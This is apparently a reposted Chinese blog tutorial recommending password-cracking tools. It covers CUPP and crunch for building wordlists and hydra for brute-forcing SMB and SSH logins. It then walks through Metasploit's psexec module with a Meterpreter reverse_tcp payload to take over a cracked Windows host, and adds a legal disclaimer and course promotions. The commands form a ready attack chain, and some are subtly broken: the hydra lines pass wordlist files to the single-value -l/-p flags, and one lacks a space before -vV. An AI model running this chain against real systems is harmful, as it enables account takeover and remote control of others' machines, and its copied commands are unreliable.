[附下载]推荐几款暴力破解和字典生成的工具
2022-7-28 07:37:5 Author: 网络安全自修室(查看原文) 阅读量:20 收藏

点击上方蓝字关注我们

1
免责声明

      本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,遵守国家相关法律法规,请勿用于违法用途如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。

2
内容速览

本文主要涉及如下内容 

  1. CUPP(kali)

  2. 亦思社会工程学学点生成器

  3. 一句话密码破解工具

  4. crunch(kali)

  5. hydra(kali)

相关字典和工具可在文末获取百度云下载地址

CUPP(kali)

首先,安装cupp软件

apt install -y cupp

新建一个文件夹,用于保存生成的字典

输入 cupp -i 命令开始编辑生成字典

根据自己已知的信息,生成字典。

查看生成的字典 cat san.txt

亦思社会工程学学点生成器

一句话密码破解工具

crunch(kali)

crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。

首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)

查看帮助

man crunch > crunch.help

命令格式

crunch <min-len> <max-len> [<charset string>]  [options]

参数说明

min-len         设定最小字符串长度(必选)
max-len         设定最大字符串长度(必选)
charset string  字符集
options
-b              指定文件输出的大小,避免字典文件过大
-c              指定文件输出的行数,即包含密码的个数
-d              限制相同元素出现的次数
-e              定义停止字符,即到该字符串就停止生成
-f              调用库文件

特殊字符

%  代表数字
^  代表特殊符号
@  代表小写字母
, 代表大写字母

查看库文件

cat /usr/share/crunch/charset.lst

如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。

例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束

crunch 1 8

例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束

crunch 1 6 abcdefg

例子3:生成指定字符串,比如生日的日期(%代表数字)

crunch 8 8 -t 199307%% -e 19930730

例子4:生成元素的组合,比如123.com

crunch 7 7 -t %%%.com -s 111.com -e 123.com

例子5:在字典中输出特殊字符

crunch 3 3  abc -t @@@ -l @aa

例子6:以元素组合生成字典[zhangsan|1993|0701]

crunch 4 4 -p zhangsan 1992 0701

例子6:

自定义字符集合

vim /usr/share/crunch/charset.lst

创建自定义字符集合

添加一个字符集 

使用自定义字符集生成[*.com] 字典文件

crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com

hydra(kali)

首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。

windows口令破解

hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr
-l	指定一个用户名
-p	指定一个密码
-P	指定密码字典
-L	指定用户名字典
-vV	显示爆破细节
-o	保存爆破结果
-f	找到正确的密码就停止爆破
-e	
	n	null
	s	same
	r	反向
-t	线程

爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。

建立payload    set payload windows/meterpreter/reverse_tcp

查看需要配置的参数 show options

设置目标主机 set RHOSTS 192.168.0.110

设置账号和密码 set SMBPass xxx    set SMBUser  xxx

run或者exploit进行连接

linux口令破解

linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。

破解ssh服务

hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64
3
获取方式
工具获取

关注公众号,回复如下消息获取

口令:字典生成工具

如果想要系统学习网络安全技术

不妨加入知识星球课程《60天入门网络安全渗透测试》

从入门到案例,贴合实战

轻松易懂、好玩实用

限时领取

知识星球优惠券

跟着60天路线(点我查看)一起学

期待你的到来!

往期推荐

从入门到入狱的技术,可以学,别乱用!

网络安全学习方向和资源整理(建议收藏)

一个web安全工程师的基础学习规划

资源 | 渗透测试工程师入门教程(限时领取)

5年老鸟推荐10个玩Python必备的网站

推荐十个成为网络安全渗透测试大佬的学习必备网站!

那些社工师不为人知的秘密。。。

更多内容请关注公众号
网络安全自修室

点个在看你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0NDYxMzk1Mg==&mid=2247495853&idx=1&sn=08ebc2532bf4b85dd4d91507ec23cfa3&chksm=e959a682de2e2f946da36b4a1e0adaefc48ada68fde679cb8912c2c87897c52d509073f7b1fc#rd
如有侵权请联系:admin#unsafe.sh